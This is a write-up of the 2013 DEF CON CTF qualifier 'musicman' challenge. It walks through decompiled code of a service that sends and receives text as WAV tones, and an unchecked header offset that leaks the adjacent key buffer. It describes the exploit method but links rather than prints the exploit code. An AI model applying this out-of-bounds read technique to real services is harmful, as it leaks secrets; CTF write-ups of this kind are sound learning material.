2013 DEF CON CTF qualifying - musicman writeup

This writeup explains how we (Andreas Straub, rep and myself as part of 0ldEr0pe) ended up pwning the musicman service during the 2013 DEF CON CTF qualifying (for which we did’t qualify this year. meh!).


The service listens on port TCP port 7890. As soon as you connect it starts throwing binary data at you. After dumping that data into a file, we recognized that this is a WAV audio file. After fucking everybody up by playing the high-pitch noise contained in that file a few times for the lulz we opened it up in audacity and saw some obvious structures:


That doesn’t look or sound like normal music.

The binary

So, let’s have a look at the binary.

This is the main function:

void __cdecl main()
  signed int v0; // [sp+2Ch] [bp-424h]@10
  signed int v1; // [sp+30h] [bp-420h]@7
  FILE *v2; // [sp+34h] [bp-41Ch]@1
  int v3; // [sp+38h] [bp-418h]@4
  int v4; // [sp+3Ch] [bp-414h]@11
  __pid_t v5; // [sp+40h] [bp-410h]@14
  int v6; // [sp+44h] [bp-40Ch]@4
  int v7; // [sp+42Ch] [bp-24h]@7
  int v8; // [sp+430h] [bp-20h]@7
  int v9; // [sp+434h] [bp-1Ch]@7
  int v10; // [sp+438h] [bp-18h]@7
  int v11; // [sp+43Ch] [bp-14h]@11
  int v12; // [sp+44Ch] [bp-4h]@1

  v12 = *MK_FP(__GS__, 20);
  signal(17, (__sighandler_t)1);
  v2 = fopen("/home/musicman/key", "r");
  if ( !v2 )
    puts("Unable to open key file");
  fgets((char *)&v6, 999, v2);
  SendString(0, (const char *)&v6, key);
  v3 = socket(2, 1, 0);
  if ( v3 < 0 )
    perror("ERROR opening socket");
  v1 = 1;
  setsockopt(v3, 1, 2, &v1, 4u);
  v7 = 0;
  v9 = 0;
  v10 = 0;
  LOWORD(v7) = 2;
  v8 = 0;
  HIWORD(v7) = htons(0x1ED2u);
  if ( bind(v3, (const struct sockaddr *)&v7, 0x10u) < 0 )
    perror("ERROR on binding");
  listen(v3, 5);
  v0 = 16;
  while ( 1 )
    v4 = accept(v3, (struct sockaddr *)&v11, (socklen_t *)&v0);
    if ( v4 < 0 )
    v5 = fork();
    if ( v5 < 0 )
      perror("ERROR on fork");
    if ( !v5 )
  perror("ERROR on accept");

The first important thing that it does is opening the keyfile and giving it to a function SendString(). After that the program does the usual socket bind-listen-accept-fork-dropprivs-dance until we land in handle_client where our connection is finally handled.

handle_client looks like this:

void __cdecl handle_client(int fd)
  int v1; // [sp+1Ch] [bp-7DCh]@2
  char s; // [sp+404h] [bp-3F4h]@2
  int v3; // [sp+7ECh] [bp-Ch]@1

  v3 = *MK_FP(__GS__, 20);
  puts("Sending string");
  SendString(fd, "Hello there...send me something\n", 0);
  while ( 1 )
    RecvString(fd, &v1, 1000u);
    snprintf(&s, 0x3E8u, "You said: %s", &v1);
    SendString(fd, &s, 0);

So, the only thing it seems to do is first sending a greeting and then receiving some data and echo it back to you. But the communication isn’t just done via normal ASCII characters. All the data is encoded in WAV-files.

Sending Text

This is the core of the SendString() function:

for ( i = 0; i <= 7; ++i )
  GenerateWave(v10, 0xFFu);
  v10 += 4410;
for ( j = 0; j < (signed int)(v3 - 1); ++j )
  GenerateWave(v10, a2[j]);
  v10 += 4410;
for ( k = 0; k <= 7; ++k )
  GenerateWave(v10, 0xFFu);
  v10 += 4410;
if ( dest )
  result = memcpy(dest, wav, *(_DWORD *)&wav[4] + 8);
  v6 = send(fd, wav, *(_DWORD *)&wav[4] + 8, 0);
  result = (void *)(*(_DWORD *)&wav[4] + 8);
  if ( (void *)v6 != result )

This function is responsible for taking an ASCII string and converting that into a WAV-file.

After some setup it calls the GenerateWave()-function 8 times with 0xFF, then it does the same for each byte in the passed string again and in a last step it again appends 8 bytes with a value of 0xFF. After that the resulting waveforms are either copied into a destination buffer or send out to a filedescriptor. The destination buffer was used for the key data and the filedescriptor is usually the socket of the client connection.

Now to get finally to the part where the actual ASCII-data is transformed into waveforms: The GenerateWave() function called repeatedly by SendString():

int __cdecl GenerateWave(int a1, unsigned __int8 a2)
  double v3; // [sp+28h] [bp-20h]@2
  signed int i; // [sp+34h] [bp-14h]@1
  signed int j; // [sp+38h] [bp-10h]@2

  for ( i = 0; i <= 2104; ++i )
    v3 = sin((long double)f[0] * 6.283185307179586 * (long double)i / 44100.0);
    for ( j = 1; j <= 8; ++j ) {
        if ( ((signed int)a2 >> (j - 1)) & 1 )
            v3 = sin((long double)f[j] * 6.283185307179586 * (long double)i / 44100.0) + v3;
    *(_WORD *)(a1 + 2 * i) = (signed __int16)(double)(v3 * 3000.0);
  return GenerateSilence(a1 + 4210);

The function looks complicated, but is actually pretty simple: It iterates over 2105 values, each representing a point in time. Audio data consists of a different values for different points in time to resemble a waveform. One second of this audio data in this example consists of 44100 samples. So what this code essentially does is iterating over 2105 of those samples, generate a sine wave with a frequency of f[0] and at the same time loop over all 8 bits of the byte to be processed and add other sine waves successively. The frequencies generated are coming from the array f:

.data:0804C0B8                 public f
.data:0804C0B8 ; __int16 f[]
.data:0804C0B8 f               dw 15000 ; DATA XREF: ReadChar+86r
.data:0804C0B8                          ; GenerateWave:loc_80499E8r ...
.data:0804C0BA                 dw 15250
.data:0804C0BC                 dw 15500
.data:0804C0BE                 dw 15750
.data:0804C0C0                 dw 16000
.data:0804C0C2                 dw 16250
.data:0804C0C4                 dw 16500
.data:0804C0C6                 dw 16750
.data:0804C0C8                 dw 17000

All these values are frequencies in HZ. So the first sine wave which is always present has a frequency of 15kHz, the lowermost bit of the to be processed byte has a frequency of 15.25kHz and so on.

So, for each byte to be transmitted a complex waveform consisting of up to 9 sine waves of different frequencies is generated followed by some silence. We obviously need to decode that stuff somehow, because the key is stored in this format, too. Let’s do it!


Actually, decoding is pretty easy: We need to process each transmitted symbol one after another and somehow extract all present frequencies for that duration. We can do that by transforming the signal from the time domain into the frequency domain using a fourier transformation. This display format shows us the spectrum of the signal or in other words which frequencies of a sine wave are contained in this complex signal consisting of several frequencies mixed together. We did this in python and plotted the spectrum a few times during development to see if we got everything right.

This is one of the 0xFF bytes at the beginning: Spectrum

And this is how an H-character looks like: Spectrum

You can perfectly see which frequencies are present and which are absent.

Now the last step we need to do is set all bits which have a peak at their frequency in the frequency domain and convert it to ASCII.

Getting the key

Before we actually got the key we also implemented the encoding of ASCII characters into a waveform which turned out to be unnecessary, but it wasn’t that much work as we already knew how the algorithm worked. You can find all the routines in the exploit.

Now, how do we get the key? The buffer of the key wav-file is only used in the main-function. Stack canaries are everywhere and all the strings are properly bounds checked. So there is nothing we can do here to exploit that service. Mark then, after looking at the code for about five minutes, finally found the one bit we needed in the receive-path of the code. RecvString() reads a whole WAV-file from the socket and puts it into the „wav“-buffer somewhere in RAM. Then it verifies a few values from the header in the WAV-file to make sure the format is correct and then successively calls ReadChar with a pointer to the wav-buffer and the number of the sample where the symbol that should be decoded starts in the WAV-file:

if ( *(_DWORD *)wav == 1179011410
  && *(_DWORD *)&wav[8] == 1163280727
  && *(_DWORD *)&wav[12] == 544501094
  && *(_DWORD *)&wav[36] == 1635017060
  && *(_DWORD *)&wav[16] == 16
  && *(_WORD *)&wav[20] == 1
  && *(_WORD *)&wav[22] == 1
  && *(_WORD *)&wav[34] == 16
  && *(_DWORD *)&wav[24] == 44100 )
  v7 = 0x44E8u;
  v8 = 0x4D85u;
  v6 = 0;
    if ( 2 * v8 >= (unsigned int)(*(_DWORD *)&wav[4] - 35272) )
    *((_BYTE *)a2 + v6++) = ReadChar(v7, v8);
    v7 = v8 + 1;
    v8 += 2206;
  while ( (signed int)(n - 1) >= v6 );
  SendString(fd, "Only know how to process 16-bit mono pcm sampled at 44100Hz\n", 0);

Now, ReadChar() does some pretty complicated stuff at first sight:

int __cdecl ReadChar(int a1, int a2)
  long double v2; // fst7@1
  long double v3; // fst7@1
  double v4; // ST08_8@13
  double v5; // ST00_8@13
  int v7[9]; // [sp+24h] [bp-64h]@2
  double v8; // [sp+48h] [bp-40h]@1
  double v9; // [sp+50h] [bp-38h]@1
  double v10; // [sp+58h] [bp-30h]@13
  int i; // [sp+60h] [bp-28h]@1
  int wavBufferStart; // [sp+64h] [bp-24h]@1
  int v13; // [sp+68h] [bp-20h]@1
  int v14; // [sp+6Ch] [bp-1Ch]@1
  void *ptr; // [sp+70h] [bp-18h]@4
  int sampleDataOffset; // [sp+74h] [bp-14h]@6
  char *v17; // [sp+78h] [bp-10h]@7
  unsigned __int8 v18; // [sp+7Fh] [bp-9h]@12

  wavBufferStart = (int)wav;
  v8 = -9999.0;
  v13 = a2 - a1;
  v2 = log((long double)(a2 - a1));
  v3 = ceil(v2 / 0.6931471805599453);
  v14 = (signed int)pow(2.0, v3);
  v9 = 44100.0 / (long double)v14;
  for ( i = 0; i <= 8; ++i )
    v7[i] = (signed int)((long double)f[i] / v9);
  ptr = malloc(16 * v14 + 8);
  if ( !ptr )
  sampleDataOffset = *(_DWORD *)(wavBufferStart + 4) - *(_DWORD *)(wavBufferStart + 40) + 8;
  for ( i = 0; i < v13; ++i )
    v17 = &wav[2 * (i + a1)] + sampleDataOffset;
    *((double *)ptr + 2 * i + 1) = (long double)*(signed __int16 *)(&wav[2 * (i + a1)] + sampleDataOffset);
    *((double *)ptr + 2 * (i + 1)) = 0.0;
  for ( i = v13; i < v14; ++i )
    *((double *)ptr + 2 * i + 1) = 0.0;
    *((double *)ptr + 2 * (i + 1)) = 0.0;
  four1((int)ptr, v14, 1);
  v18 = 0;
  for ( i = 1; i <= 8; ++i )   {     v4 = *((double *)ptr + 2 * (v7[i] + 1));     v5 = *((double *)ptr + 2 * v7[i] + 1);     v10 = GetFrequencyIntensity(LODWORD(v5), HIDWORD(v5), LODWORD(v4), HIDWORD(v4));     if ( v10 > 1000000.0 )
      v18 |= 1 << (i - 1);
  return v18;

I won’t go into the details here, because I don’t know them and we don’t need to understand that function completely to exploit the service, but notice line 32: The function needs to find the samples in the WAV-file to do the frequency analysis for converting the waveforms back into binary data. This is done here.

It takes the value at offset 4 from the WAV-header, subtracts the value at offset 40 from that and adds 8. What?

Let’s have a look at the WAV-header in detail:

Offset Length Explanation
0 (0x00) 4 ‘RIFF’
4 (0x04) 4  − 8
8 (0x08) 4 ‘WAVE’
12 (0x0C) 4 ‘fmt ‘
16 (0x10) 4
20 (0x14) 2
22 (0x16) 2
24 (0x18) 4
28 (0x1C) 4
32 (0x20) 2
34 (0x22) 2
36 (0x24) 4 ‘data’
40 (0x28) 4
44 (0x2C) n sampledata

At offset 4 is the total filesize minus 8 and offset 40 is the offset in the file of the sample data. So the formula in line 32 basically calculates the offset of the sample buffer start in memory. Then in line 35 the sample is actually fetched from memory and processed.

Now the file size and the offset to the sample data is fully under our control. The filesize is used in the receive loop to receive data from the socket, so we can’t modify that. But the value at offset 40 is never checked for validity. We can have it point to a value outside of the wav-buffer.

If we look at the memory layout of the key- and the wav-buffer, we see that the key-buffer is directly in front of the wav-buffer. So, if we set this value to a big size, we are fetching the sample data from the key- instead of the wav-buffer. Fuck yeah!

How big does this value need to be? Every buffer has a size of 0xF4240 bytes, so we just add this exact value to the sample data offset of the WAV-file we are going to send to the musicman and we end up at the samples in the key-buffer. Instead of the data we send in the wav file, the the data in the key-buffer is then decoded to ASCII and then prepended with “You said: “ and finally sent back to us in another WAV-file. We decode that and boom - we got the key!

The exploit

The exploit itself is available here. I added the daemon itself, too. I hope this is ok.

Keep in mind that this code is not the prettiest, we wrote that stuff under pressure ;)

All in all it was a really awesome challenge. Especially if you just started digging deeper in digital signal processing because you started playing with a software defined radio.